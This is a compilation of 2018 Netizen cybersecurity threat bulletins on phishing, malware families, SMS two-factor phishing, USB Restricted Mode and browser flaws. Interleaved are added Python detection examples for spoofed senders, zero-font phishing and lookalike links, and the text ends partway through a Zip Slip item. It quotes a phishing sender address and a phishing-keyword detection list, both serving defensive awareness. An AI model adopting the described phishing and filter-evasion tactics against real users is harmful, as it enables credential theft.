• Netizen Cybersecurity Bulletin: 11 July 2018 Edition

    In this issue:

    In this week’s issue, you’ll find information regarding the most current critical threats and preventative measures to lessen the chances of a breach.

    • Gmail, and peeping third-party developers
    • USB Restricted Mode issues
    • “Alexa, pay my bills.”
    • How can Netizen Help?

Gmail, and peeping third-party developers

Depending on your current personal Gmail settings, third-party developers may be able to read your Google emails. While this may come as a surprise, third-party devs only have access because the end user has permitted it. For certain applications to function they need access and permission to operate; the issue arises when said applications are unsecured or even malicious, posing a serious threat to privacy. Google responded by admitting that third-party developers are able to view a user’s email; however, they maintain that the only way a dev can do so is by receiving permission from the user. While granting such permissions is common among other email providers too, the issue becomes more serious when not just personal information is involved, but corporate data and intel as well.

    While this seems cut and dry, it can easily be overlooked as not everyone realizes that their Gmail accounts are permitted to be viewed by outside parties.

    Recommendations

    • Again, this sounds obvious, but do not conduct any company business with your personal email. This should be a standard of the organization.
    • Stop using third-party apps. If not feasible, scrutinize the permissions of the application and limit its access as much as possible.
    • Gmail Security Check-up can be utilized to see which third-party apps are connected to your account and what permissions have been granted. If you find an app that you do not want to have access, you can remove it accordingly.
    • Make use of encrypted email services, and check your current email configurations (even the company’s) to see if there is any outside access given.

    “Alexa, pay my bills.”

More and more uses of smart speakers – like Amazon Echo, Apple Siri, & Google Home – are making our lives more connected and perhaps more entertaining. Anyone who has ever enjoyed a science-fiction story where the hero starts a request with “Computer…” has waited to do the same thing in their own home. Smart speakers can create lists, play games, play media, send and receive audio and video communications, and even order goods and services. But should they also handle purely financial transactions as well?

American Express and Capital One are two credit card issuers that allow users to pay bills through their smart speaker, which poses a small risk to the consumer. Regional banks have gone further, letting customers use a smart speaker for account balance inquiries and for mortgage and bill payments. While the risk of someone fraudulently paying your bills is minimal, the privacy of your account balances is something to consider. Financial institutions may encourage a PIN to protect the account information, but if you are overheard speaking the PIN, it is hardly secure.

    As advanced as these smart speakers have already become, there are many times when instructions or commands spoken to them are misheard. Should you request a payment to be sent to a friend or relative and the device mishears the name you speak, you may have a headache resolving the matter.

    Most importantly, as with any connected device, the opportunity for a vulnerability to be uncovered can lead to a financial catastrophe. As using these devices for financial transactions is still new, the attention hackers pay to them is probably minimal. It won’t be long, however, before the bad guys look to exploit these devices in search of potentially draining your account.

    Recommendations

    • Evaluate your need for using a smart speaker to handle your financial data.
    • Always use a strong password and PIN, and never use these on more than one online account.

    USB Restricted Mode issues

Apple has recently released iOS 11.4.1, which includes a new security feature to protect your phone from malicious USB accessories that connect to its data port. This makes it harder for attackers to break into your device without your permission.

Called USB Restricted Mode, this feature automatically disables the data connection on your iPhone or iPad’s data port after the device has been locked for an hour or longer.

Security researchers, however, have found that connecting a USB accessory, such as a Lightning-to-USB camera adapter, to a recently locked device resets the one-hour countdown.

While the vulnerability is not extremely severe, it certainly could be a costly mistake if a user was expecting their data connection to be disabled but it was still active because a USB accessory was connected before the lockout window.

This feature comes amid a growing number of juice-jacking stations: malicious free charging stations set up by attackers to gain access to your device and steal personal and sensitive data.

    Recommendations

• Keep your devices charged! When going out for a long time, ensure your device is charged completely. Make it a habit to charge your devices when they are not in use.
• Avoid using public chargers, and if you must, ensure you are plugging into a mains (AC) power adapter and not a USB data connection.
    • Carry a power bank or charger, so if you must recharge you are doing so from a trusted source.
    • Get a charge-only cable so that you can safely plug into public charging stations.

    How Can Netizen Help?

    Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.  We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

    Netizen is an ISO 27001:2013 (Information Security Management) certified company.


  • Allentown, PA: Netizen Corporation, an award-winning provider of cyber security solutions for defense, government and commercial markets, has officially received ISO 27001:2013 (Information Security Management) certification. The scope of this certification program applies to all company operations as well as the products and services Netizen provides to customers worldwide.

    The ISO 27001 program validates that a company’s Information Security Management System (ISMS) has been designed, implemented and managed in accordance with globally recognized best practices to protect both customer and company information systems and assets. The multi-phase compliance audit was conducted by Intertek.

    “Since our founding, we have been committed to providing best-of-breed cyber security solutions while constantly improving our operations. This new certification validates that commitment while demonstrating to customers that they can trust in our dedication to providing world-class products, services and cyber expertise that truly set us apart from the competition,” said Michael Hawkins, Netizen’s Chief Executive Officer. He added that, with this new certification, Netizen has achieved greater corporate maturity by developing, implementing and enforcing formalized policies, tools and procedures over the past several years in accordance with global security and quality standards.

    Netizen is not a “general information technology (IT) services company” but rather a highly specialized cyber security and compliance solutions provider that works in partnership with IT departments, information system owners/developers, and IT Managed Service Providers (MSPs) to ensure appropriate levels of security and compliance controls are implemented and maintained. Netizen has been awarded over $15,000,000 (fifteen million dollars) in new contracts to provide cyber security and related solutions to the federal government, Department of Defense (DoD), and commercial organizations over the past two years. They also provide these solutions to state and municipal governments and businesses ranging from local manufacturing, finance and health care organizations to Fortune 500 entities.

    About Netizen Corporation: Named the Lehigh Valley’s “Emerging Business of the Year” and “Veteran Owned Business of the Year” and a recipient of multiple Department of Defense (DoD) awards for superior performance, Netizen is an Allentown, PA based Veteran-Owned company (SDVOSB) specializing in cyber security and compliance solutions for defense, commercial and government markets. Their new commercial-focused subsidiary, CyberSecure Solutions, is also trusted to engineer, implement, audit and maintain cyber security solutions for businesses worldwide. Learn more at NetizenCorp.com and goCyberSecure.com.

    POINT OF CONTACT:

    Rocco Zegalia
    Vice President of Sales and Marketing
    1-800-450-1773 ext. 717
rzegalia@NetizenCorp.com

  • Netizen Cybersecurity Bulletin: 5 July 2018 Edition

    In this issue:

    In this week’s issue, you’ll find information regarding the most current critical threats and preventative measures to lessen the chances of a breach.

    • IoT in the Workplace: Are you at risk?
• Fake OVERDUE INVOICES alert: malware disguised as billing notices
• Two-Factor Inauthentication – The Rise in SMS Phishing Attacks
    • How can Netizen Help?

    Cybersecurity Assurance TIPS

    IoT in the Workplace

    Are you at Risk?

As mobile and IoT devices become more and more important to the overall success of modern business, the inherent security vulnerabilities they bring to information technology infrastructures become more acute—and more dangerous. The enthusiastic, and somewhat reckless, embrace of BYOD mobile and IoT devices by so many businesses, all hoping to capitalize on employee mobile productivity, may have far-reaching and costly security consequences for all of us.

According to Verizon’s Mobile Security Index 2018, only 14% of the responding organizations said they had implemented even the most basic cybersecurity practices, with an astonishing 32% of these IT professionals admitting that their organization regularly sacrifices mobile security to improve business performance. That generally lax attitude toward cybersecurity goes a long way toward explaining why IoT attacks have spiked 600% in one year.

Businesses, regardless of size or technical sophistication, can’t afford to continue treating cybersecurity, especially with regard to IoT, as an afterthought. Besides the obvious costs of lost productivity from system downtime, there is a substantial potential for fines and penalties stemming from data loss and violation of privacy regulations. Whether you like it or not, cybersecurity must be a vital and integral part of your strategic plan.

    Recommendation:

• Ensure any IoT device installed in the workplace complies with the business’ System Security Plan for ‘BYOD’ devices.

    Fake URGENT PAYMENT for overdue bills

    Malware delivered in phony billing notice

An email with the subject “FW: URGENT PAYMENT FOR OVERDUE INVOICES”, pretending to come from FINANCE <salgar@dgkw.com> and carrying both a malicious Word DOC and an Excel XLS spreadsheet attachment, delivers the Formbook malware. The only real reason to mention this one is the dual attachment: the senders are trying to get two bites at the cherry. They are using email addresses and subjects that will scare or entice a user into reading the email and opening the attachment. A very high proportion are being targeted at small and medium-sized businesses, in the hope of getting a better response than they do from consumers.

    Remember many email clients, especially on a mobile phone or tablet, only show the Name in the From: and not the bit in <domain.com>. That is why these scams and phishes work so well.

    All the alleged senders, companies, names of employees, phone numbers, amounts, reference numbers etc. mentioned in the emails are all innocent and are just picked at random. Some of these companies will exist and some won’t. Don’t try to respond by phone or email, all you will do is end up with an innocent person or company who have had their details spoofed and picked at random from a long list that the bad guys have previously found. The bad guys choose companies, Government departments and other organizations with subjects that are designed to entice you or alarm you into blindly opening the attachment or clicking the link in the email to see what is happening.
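The spoofed FINANCE sender above works because many clients show only the display name. The following check, added here as an example and not part of the Netizen bulletin, parses a From: header and flags the two patterns described: an internal-sounding name arriving from an external domain, and a display name crafted to look like an address. ORG_DOMAINS and ROLE_NAMES are constructed placeholder values; the first sample header is the one quoted in the bulletin, the others are constructed.

```python
"""Flag From: headers whose display name hides the real sender domain.

Added example (not part of the Netizen bulletin). ORG_DOMAINS and
ROLE_NAMES are constructed values standing in for an organisation's
own mail domains and the internal-sounding names attackers borrow.
"""
import re
from email.utils import parseaddr

ORG_DOMAINS = {"example.com"}                                            # constructed
ROLE_NAMES = {"finance", "accounts payable", "it support", "hr", "ceo"}  # constructed
# an e-mail address embedded in the display name, e.g. "ceo@example.com" <x@y>
ADDRESS_IN_NAME = re.compile(r"[\w.+-]+@([\w-]+(?:\.[\w-]+)+)")


def sender_parts(from_header: str) -> tuple:
    """Split a From: header into (display name, address, address domain)."""
    name, addr = parseaddr(from_header)
    domain = addr.rpartition("@")[2].lower() if "@" in addr else ""
    return name.strip(), addr, domain


def check_from(from_header: str) -> list:
    """Return the reasons the header deserves a closer look (empty list if none)."""
    name, addr, domain = sender_parts(from_header)
    if not addr or not domain:
        return ["unparseable or missing sender address"]
    findings = []
    external = domain not in ORG_DOMAINS
    if external:
        findings.append(f"sender domain {domain!r} is not an organisation domain")
    shown = ADDRESS_IN_NAME.search(name)
    if shown and shown.group(1).lower() != domain:
        # mobile clients show only the name, so the name is made to look like an address
        findings.append(f"display name shows {shown.group(0)!r} but address is {addr!r}")
    elif external and name.lower() in ROLE_NAMES:
        findings.append(f"internal-looking name {name!r} sent from an external domain")
    return findings


if __name__ == "__main__":
    # first header is the one quoted in the bulletin; the other two are constructed
    for header in ("FINANCE <salgar@dgkw.com>",
                   '"ceo@example.com" <mailbox@mail-relay.invalid>',
                   "Jane Doe <jane@example.com>"):
        print(header, "->", check_from(header) or "ok")
```

A mail gateway rule built on this would typically tag or quarantine rather than block outright, since legitimate partners do send invoices from external domains; the value is in surfacing the mismatch the user never sees.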

    Recommendation:

By default, Protected View is enabled and macros are disabled, UNLESS you or your company have enabled them. If Protected View is turned off and macros are enabled, then opening this malicious Word document will infect you, and simply previewing it in Windows Explorer or your email client might well be enough to infect you.

Two-Factor Inauthentication

    The Rise in SMS Phishing Attacks

As cyber criminals are constantly on the prowl to capture passwords and other credentials, two-factor authentication (2FA) has become one of the most widely accepted backup verifications for many services and companies. Since nearly everyone has a mobile phone, the 2FA method most widely used is a code sent via SMS text message.

However, SMS is not entirely secure. Anyone with direct access to your cell phone can pretend to be you and have a code sent to your device. In fact, thieves do not need to have the device in their hands, as 2FA is also vulnerable to remote phishing. We most often think of phishing attacks as taking place over email, targeting information such as passwords, but the same tactic can very easily be applied over SMS, targeting reset codes. One particularly powerful technique is the Verification Code Forwarding Attack, or VCFA. For this approach, the criminal accesses a service provider and requests an SMS code to reset the password of a particular user. Immediately afterwards, they send a fake text message to the same user, pretending to be the service provider and asking for the code “as an additional verification measure”.

In a research experiment conducted at New York University, it was discovered that the VCFA technique can be incredibly effective. 300 volunteers, who were not aware that the experiment involved SMS phishing, were sent a variety of different messages modelled on real SMS from their email provider. The most successful message was able to fool 50 percent of recipients into giving up their authentication code, which is an impossibly high result for most forms of social engineering. By comparison, most non-targeted email-based phishing attacks have a success rate of around 1 percent, with the very best reaching two or three percent.

Any service being breached in this way would mean severe repercussions for the victim, most obviously online payment, retail, and anything else connected to financial data. The holy grail for any attacker is to gain access to an email account, a tactic known as Email Account Compromise (EAC).

While financial details can be exploited as a one-off opportunity before the bank takes action, an email account can be used to cause much more damage.

As SMS remains so widespread and more attackers pick up on SMS phishing attacks, it is more important than ever for organizations to be aware that their workforce’s digital identities may be compromised.

    Recommendation

    • Adopt using a code-generating app such as Microsoft Authenticator on your mobile device

    How can Netizen Help?

Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.

Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

  • Netizen Threat Brief: 27 June 2018 Edition

    Threats:

    Listed below is information regarding this week’s most critical threats and preventative measures to lessen the chances of a breach:

    1. MyloBot
    2. WannaCry Extortion Fraud
    3. Wavethrough
    4. Stay Safe on Public Wi-Fi
    5. ZeroFont

    1. MyloBot

    Overview

A new, sophisticated malware dubbed MyloBot has been discovered with smart evasion, infection, and propagation techniques.

    MyloBot behaviors include:

• Process hollowing: a legitimate process that is supposed to run on a computer is used as a container, or host, for malicious code. This technique helps hide the malware.
• Reflective EXE loading: loading executable files from memory into a host process.
• Code injection: invalid data processing allows malicious code to be “injected” into a vulnerable computer to change a program’s intended outcome.
• Ransomware payload
• Data theft
• Anti-VM (virtual machine) capabilities
• Anti-sandbox capabilities: a sandbox is a form of testing environment for untested code. MyloBot circumvents this.
• Anti-debugging capabilities

A successful MyloBot infection allows attackers to gain full control of a victim’s machine. Full control would let the attacker add further damage, such as keyloggers (recording a user’s keyboard strokes), banking Trojans, and Distributed Denial of Service (DDoS) attacks. One last interesting ability of MyloBot is that it actually seeks out and destroys any other malware on a system so that it can gain the most profit from the victim.

    Recommendations

    We recommend the following steps to help protect your organization from MyloBot:

    • Ensure a multi-layered approach and protection for your systems to prevent, detect and remove threats from the gateway to the endpoints.
    • Regularly back up your files. Practice the 3-2-1 system to minimize or mitigate data loss; the 3-2-1 system is when you have 3 copies of your data (1 production and 2 backup copies) on two different types of media with one off site copy for disaster recovery purposes.
    • Employ data categorization (organizing data correctly and efficiently) and network segmentation (the guest network of the organization should not be able to talk to the company internal network).

    2. WannaCry Extortion Fraud

    Overview

    Extortion emails are sent by hackers to try and threaten or intimidate users into paying money (often in Bitcoin), lest they face the wrath of the WannaCry ransomware. The extortion emails that have been circulating are designed to cause panic and state that all of the victim’s devices have been infected with WannaCry; this is in fact a fraud and actually just a phishing attempt. This “your computer is infected, pay us” approach is a classic in the social engineering realm and has been used for years.

    Recommendations

While understandably scary, do not panic. More often than not, if you are infected with ransomware, you wouldn’t even be able to access anything, let alone your email. A prompt would surface on startup claiming the computer is encrypted. To be on the lookout for this fraud, we recommend:

• Be skeptical of emails. Examine them closely, and do not click on any links or download attachments. If something does not seem right, it probably isn’t. Verify emails that pose as legitimate companies.
    • Develop and execute a plan for end-user awareness on recognizing phishing emails. Last week’s threat brief was a good example of a phishing attempt.
    • Perform routine updates and patches for antivirus solutions, software, applications, and operating systems as is best practice.

    3. Wavethrough

    Overview

    A Google researcher has found a vulnerability in many modern browsers which could allow malicious websites to steal sensitive content from websites you are currently logged into on the same browser. By tricking the victim to play or view a malicious embedded media file, the browser is exploited into sending elements from other open tabs. These media elements could contain sensitive information or conversations that the victim may have open.

    Recommendations

    • Ensure browsers and applications are continually updated to ensure the latest security patches are in place.
• Be vigilant when browsing new or unknown websites, and refrain from playing any embedded media that you are suspicious of.
    • Practice good browsing techniques and limit the simultaneous browsing of business and leisure pages to avoid cross-script exploitation.

4. Stay Safe on Public Wi-Fi

    Overview

    Public Wi-Fi has become so accessible that many of us eagerly search for it and connect to open hubs without thinking.  Many are travelling in the warmer months, and often use hotel or other hotspots to stay connected.

    However, connecting to public Wi-Fi could leave you exposed to cybercriminals that might keep tabs on your financial transactions, email correspondences or anything else you do online.

    One of the most common methods of attack involves hackers tricking you into thinking you’re connected to a valid network — such as one operated by a hotel or coffee shop. In reality, hackers named the false network to make it seem legit to unsuspecting victims, then monitor individuals’ activities.

    You can stay safer while connected to a public network by doing a few simple things every time you connect.

    Recommendations

    Don’t Store the Network Login Credentials

    Computers can handily remember passwords and usernames required for public Wi-Fi access if you consent to use that feature. However, it’s best to disable that capability — usually by un-checking the Remember This Network box when logging in. You may also need to go into your computer’s settings and manually delete networks to make it forget Wi-Fi connections when you’re not using them.

    Otherwise, your computer or mobile device could log in to networks without your knowledge. That typically happens whenever you’re in range of a previously used Wi-Fi network.

    Avoid Connecting Workplace Devices

    Sometimes instead of taking things from your computer, hackers install stuff onto it. Malware is one of the software-related risks associated with unsecured devices people use for work. The best practice is not to connect your workplace equipment to public hotspots at all. Then, hackers can’t infiltrate it to either steal data or add corrupt applications.

    Only Visit Extra-Secure Sites or Take Part in Casual Browsing

    Get in the habit of only going to websites that include the “https” prefix or offer two-factor authentication. Then, if a hacker does enter your system as you use a public network, it’s harder for them to obtain useful details.

    Consider only using public Wi-Fi when doing things not of interest to cybercriminals — for example, checking the weather forecast or reading the news headlines. Don’t check your bank account or participate in online shopping.

    5. ZeroFont

    Overview

In recent attacks, cyber criminals have been leveraging tiny font sizes to bypass Office 365 spam protection and deliver malicious phishing emails to users and companies. By inserting characters with the font size set to ‘0’, they make the email look normal to the victim while confusing spam filters, which can no longer match certain words and so let these malicious emails through.
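The trick only works against a filter that matches keywords on the raw text. The parser below, added here as an example and not taken from the Netizen bulletin, separates the text a recipient actually sees from text hidden with a zero font size so keyword rules can run on the rendered text. It handles inline style attributes only; SUSPICIOUS and SAMPLE are constructed values, and the sample message splits filter keywords with zero-font padding the way the overview describes.

```python
"""Separate the text a recipient sees from text hidden with font-size 0.

Added example (not from the Netizen bulletin). It only handles inline
style attributes; SUSPICIOUS and SAMPLE are constructed values.
"""
import re
from html.parser import HTMLParser

# font-size:0, 0px, 0pt, 0em, 0.0 ... optionally followed by !important
ZERO_FONT = re.compile(r"font-size\s*:\s*0(?:\.0+)?\s*(?:px|pt|em|rem|%)?\s*(?:;|!|$)", re.I)
VOID_TAGS = {"br", "img", "hr", "meta", "link", "input", "wbr", "area", "base", "col", "source"}
SUSPICIOUS = ("password", "verify your account", "microsoft")   # constructed filter terms


class ZeroFontExtractor(HTMLParser):
    """Collect visible and zero-font text separately, honouring nesting."""

    def __init__(self):
        super().__init__()
        self.visible, self.hidden = [], []
        self._open = []          # stack of (tag, hidden?) for open elements

    def handle_starttag(self, tag, attrs):
        style = dict(attrs).get("style") or ""
        parent_hidden = self._open[-1][1] if self._open else False
        hidden = parent_hidden or bool(ZERO_FONT.search(style))
        if tag not in VOID_TAGS:
            self._open.append((tag, hidden))

    def handle_endtag(self, tag):
        # pop back to the matching open tag; tolerant of sloppy markup
        for i in range(len(self._open) - 1, -1, -1):
            if self._open[i][0] == tag:
                del self._open[i:]
                break

    def handle_data(self, data):
        if self._open and self._open[-1][0] in ("script", "style"):
            return
        hidden = self._open[-1][1] if self._open else False
        (self.hidden if hidden else self.visible).append(data)


def _squash(s: str) -> str:
    return re.sub(r"\s+", " ", s).strip()


def naive_text(html: str) -> str:
    """What a filter sees if it strips tags but ignores styling."""
    return _squash(re.sub(r"<[^>]+>", "", html))


def analyze(html: str) -> dict:
    p = ZeroFontExtractor()
    p.feed(html)
    p.close()
    return {
        "visible_text": _squash("".join(p.visible)),   # join with "" so split words re-join
        "hidden_text": _squash(" ".join(p.hidden)),
        "zero_font_used": bool(p.hidden),
    }


def flagged_terms(text: str) -> list:
    return [t for t in SUSPICIOUS if t in text.lower()]


# Constructed sample: the sender splits filter keywords with zero-font junk.
SAMPLE = """<html><body>
<p>Dear user, your <span style="font-size:0px">q</span>Micro<span style="font-size: 0;">zz</span>soft account
will be suspended. Please <a href="http://login.example.invalid/">verify your acc<span style="font-size:0">x</span>ount</a>
and enter your pass<span style="FONT-SIZE:0pt !important">##</span>word.</p>
</body></html>"""

if __name__ == "__main__":
    report = analyze(SAMPLE)
    print("filter on raw text sees:    ", flagged_terms(naive_text(SAMPLE)))
    print("filter on visible text sees:", flagged_terms(report["visible_text"]))
    print("hidden padding:", report["hidden_text"])
```

The presence of any hidden text at all is itself a strong signal: legitimate mail has little reason to carry zero-font characters, so a rule can score `zero_font_used` on its own, before any keyword matching.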

    Recommendations

    • Continue to be vigilant when opening emails, looking for spelling mistakes, or requests for sensitive information.
• Consider setting your email client to display emails as plain text, as this will help filter out specially crafted emails that are designed to evade spam filters.
• Ensure users are continually educated on the dangers of phishing emails and what to look for when browsing their email.

  • Netizen Threat Brief: 20 June 2018 Edition

    Threats:

    Listed below is information regarding this week’s most critical threats and preventative measures to lessen the chances of a breach:

    1. Phishing Email
    2. Vulnerable Cloud Containers
    3. Sneaky Windows malware delivers adware
    4. Invisimole
    5. Firefox fixes critical buffer overflow

    1. Phishing Email

    Overview

    Just recently, Netizen has received a phishing email depicted below:

[Image: phishingblackbar (screenshot of the phishing email)]

    From the looks of it, the email appears to be legitimately from Chase. However, further inspection of the link reveals suspicious details:

[Image: phishingblackbar2 (screenshot showing the link’s details)]

    We can see that the link points to a website based out of Chile (as depicted by the .cl domain) and is not actually from Chase Bank.

    Recommendations

    A Phishing email will typically direct the user to visit a website where they are asked to update personal information, such as a password, credit card, social security, or bank account numbers, that the legitimate organization already has.

    Here are our recommendations and tips on what to watch out for when it comes to suspicious emails:

    • Scrutinize your emails before clicking anything. Did you order or ask for anything for which you’re expecting a confirmation? Did the email come from a store you don’t usually order supplies from or a service you don’t use? If so, it’s probably a phishing attempt.
• Verify that the sender is actually from the company sending the message.
• Did you receive a message or email from someone you don’t recognize? Are they asking you to sign into a website to give Personally Identifiable Information (PII) such as credit card numbers, social security number, etc.? A legitimate company will never ask for PII via instant message or email—this is a huge red flag.
    • Do not give out personal or company information.
    • Review both signature and salutation.
• Do not click on attachments.
    • Do not click on unrecognized links. If you do proceed, verify that the URL is the correct one for the company/service and it has the proper security in place, such as HTTPS.
    • Be wary of poor spelling, grammar, and formatting.
    • Many phishing emails pose a sense of urgency or even aggressiveness to prompt a form of intimidation. Any email requesting immediate action or that is addressing you in a threatening manner should be questionable. Also, beware of messages that seek to tempt users into opening an attachment or visiting a link. For example, an attachment titled “Staff Pay Raises 2018” may seem like something you really want to know about, but it could just be a ploy to plant malware on your system or steal your credentials.
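The link inspection in the overview above (a .cl host masquerading as Chase) and the last two recommendations (verify the URL belongs to the company and uses HTTPS) can be automated. The following is an added example, not code from the Netizen bulletin: it extracts every link from an HTML body, then checks the scheme, whether the host is under the claimed brand's domain (suffix match, so `chase.com.something.cl` does not pass), and whether the clickable text names a different host than the one the link actually goes to. BRAND_DOMAINS is a constructed allow-list and SAMPLE_EMAIL a constructed message; its first host is invented to mimic the bulletin's Chile-hosted page and is not an observed indicator.

```python
"""Check the links in an e-mail body against the brand it claims to be from.

Added example (not from the Netizen bulletin). BRAND_DOMAINS is a
constructed allow-list and SAMPLE_EMAIL a constructed message; the
.cl host in it is invented, not an observed indicator.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

BRAND_DOMAINS = {"chase": ("chase.com",)}            # constructed allow-list
# something that looks like a host name inside the clickable text
HOST_IN_TEXT = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)


class LinkExtractor(HTMLParser):
    """Collect (href, anchor text) pairs from an HTML body."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href") or "", []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, re.sub(r"\s+", " ", "".join(self._text)).strip()))
            self._href = None


def extract_links(html: str) -> list:
    p = LinkExtractor()
    p.feed(html)
    p.close()
    return p.links


def host_of(url: str) -> str:
    return (urlparse(url).hostname or "").lower()


def is_brand_host(host: str, brand: str) -> bool:
    """True only if host is the brand domain or a subdomain of it (suffix, not substring)."""
    return any(host == d or host.endswith("." + d) for d in BRAND_DOMAINS[brand])


def check_links(html: str, brand: str) -> list:
    """One dict per link; an empty 'reasons' list means the link passed every check."""
    results = []
    for href, text in extract_links(html):
        host = host_of(href)
        reasons = []
        if urlparse(href).scheme != "https":
            reasons.append("not HTTPS")
        if not is_brand_host(host, brand):
            reasons.append(f"host {host!r} is not under {', '.join(BRAND_DOMAINS[brand])}")
        for shown in HOST_IN_TEXT.findall(text):
            # "chase.com" shown for a link to www.chase.com is fine; any other host is not
            if shown.lower() != host and not host.endswith("." + shown.lower()):
                reasons.append(f"text shows {shown!r} but link goes to {host!r}")
        results.append({"href": href, "text": text, "host": host, "reasons": reasons})
    return results


# Constructed sample e-mail: the first link mimics the bulletin's Chile-hosted page
SAMPLE_EMAIL = """<p>Dear Chase customer, please
<a href="http://chase.com.secure-login.cl/verify">sign in to chase.com</a>
to confirm your details.</p>
<p><a href="https://www.chase.com/">Visit Chase</a></p>"""

if __name__ == "__main__":
    for r in check_links(SAMPLE_EMAIL, "chase"):
        print(r["href"], "->", r["reasons"] or "ok")
```

The suffix match is the important detail: a substring test for "chase.com" would accept the first link, which is exactly the kind of host a phisher registers.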

    2. Vulnerable Cloud Containers

    Overview

    As the cloud is developed and technologies progress further, so do the risks of using these services. Around 22,000 cloud containers and application programming interface (API) management systems have been found unprotected, or publicly available on the Internet. Containers are a form of Infrastructure-as-a-Service (IaaS) that offers operating system virtualization that is more efficient than typical hardware virtualization. The containers discovered had poorly configured resources, a lack of credentials, and the use of non-secure protocols. As a result of these poor practices and security measures, attackers would be able to remotely access company infrastructure to either install, remove, or encrypt any application that the organization may be using in the cloud.

    Recommendations

    We recommend the following mitigations:

    • Secure containers with complex and strong passwords.
• Utilize secure protocols (SSL/TLS).
    • Scan container images and registries to search for security flaws within them.
    • Monitor data that flows in and out of containers to search for any suspicious activity.
    • Encrypt data, when in transit and when at rest.
    • Keep your systems up to date.
    • Limit user access to administrative privileges to only those that need it.

    3. Sneaky Windows Malware Delivers Adware

    Overview

    A newly uncovered form of stealthy and persistent malware is distributing adware to victims across the world while also allowing attackers to take screenshots of infected machines’ desktops. Discovered by researchers at Bitdefender, the malware has been named Zacinlo after the name of the final payload that’s delivered by the campaign which first appeared in 2012.

    The vast majority of Zacinlo victims are in the US, with 90 percent of those infected running Microsoft Windows 10. There are also victims in other regions of the world, including Western Europe, China and India. A small percentage of victims are running Windows 7 or Windows 8.

What makes Zacinlo so unusual is that it is delivered by a rootkit, a malicious form of software which can manipulate the operating system and any installed anti-malware in such a way as to make the computer oblivious to the existence of the malware. Rootkit-based malware is complex and is therefore rare, accounting for less than one percent of all malware.

    Once downloaded, the false application pretends to act as a VPN would, but does nothing but act as a delivery mechanism for the malware, which uses the rootkit as a means of downloading files and eventually delivering the final Zacinlo payload.

    The main goal of Zacinlo is to deliver adware, displaying adverts developed by the attackers in webpages the user visits and to secretly click through to them to generate ad revenue. Popular browsers including Edge, Internet Explorer, Firefox, Chrome, Opera, and Safari can all be used to drive the adware.

    Ironically, in order to ensure it can carry out its goal, the malware can also clean up any other adware the victim device may be infected with.

    Zacinlo is extremely persistent, secretly going about its business until it is told to stop by those running the command and control server — but using the computer to generate ad fraud isn’t the only threat posed by the malware.

    The malware is stealthy, but it can be detected if the system is scanned in safe mode.

    Recommendations

    • Never download attachments without knowing where they have originated.
    • Alert your Information Security staff if you suspect advertisements are appearing on unusual sites

    4. Invisimole

    Overview

Security researchers have discovered a sophisticated cyber-espionage malware tool, dubbed Invisimole, that can allow attackers to turn ordinary PCs into full-fledged spying devices. It is capable of remotely turning on the microphone or video camera of the compromised machine, allowing the attacker to listen in on and record conversations near the infected computer. It can also take screenshots of applications running in the background and even scan nearby wireless networks to geolocate the victim.

    Recommendations

    • Ensure recent updates and patches are applied to the operating system, internet browsers, and any addon plugins.
    • Remove old and outdated software that is no longer in use.
    • Be vigilant when reading emails, and do not download and run attachments from suspicious emails.
    • Ensure the use and frequent updating of firewalls, antivirus, and anti-malware technology.

    5. Firefox Fixes Critical Buffer Overflow

    Overview

    Mozilla announced a security advisory (MFSA2018-14) for its Firefox browser, noting that version 60.0.2 of both Firefox and Firefox Extended Support Release (ESR), as well as the legacy ESR (ESR 52.8.1), now includes a fix for a critical-level buffer overflow vulnerability.

    The buffer overflow bug occurs within Firefox’s implementation of the Skia library, an open-source graphics library that is used by almost all of the mainstream browsers.

    Skia is used for rendering and rasterizing images and text, and the reporting researcher, Ivan Fratric, found that an attacker could trigger a buffer overflow during the rasterization process by supplying a malicious SVG image file with anti-aliasing turned off. The Mozilla advisory says this buffer overflow could result in “a potentially exploitable crash.”

    The fixed versions of Firefox became available on 6 June, so if you’ve run your browser lately, the chances are it’s already patched.

    Recommendations

    • To be sure, check which version of the browser you are running — in Firefox on Windows, go to Help and select About Firefox; on a Mac, open the Firefox menu and select About Firefox.

    How can Netizen help?

    Netizen ensures that security gets built in and not bolted on. We provide advanced solutions to protect critical IT infrastructure, such as the popular “CISO-as-a-Service”, wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time. We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.

    Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.

  • Netizen Threat Brief: 13 June 2018 Edition

    Threats:

    Listed below is information regarding this week’s most critical threats and preventative measures to lessen the chances of a breach:

    1. Zip Slip
    2. Password Reset Flaw
    3. Loki Bot Malware
    4. MitM Chrome Extension
    5. MyHeritage Breach

    1. Zip Slip

    Overview

    Thousands of online projects may be affected by a vulnerability known as Zip Slip. Attackers have discovered that they can create Zip archives that use a directory traversal attack, which enables them to reach files and directories stored outside the default extraction folder. This allows the attacker to overwrite important files on affected systems, either destroying them or replacing them with malicious substitutes.

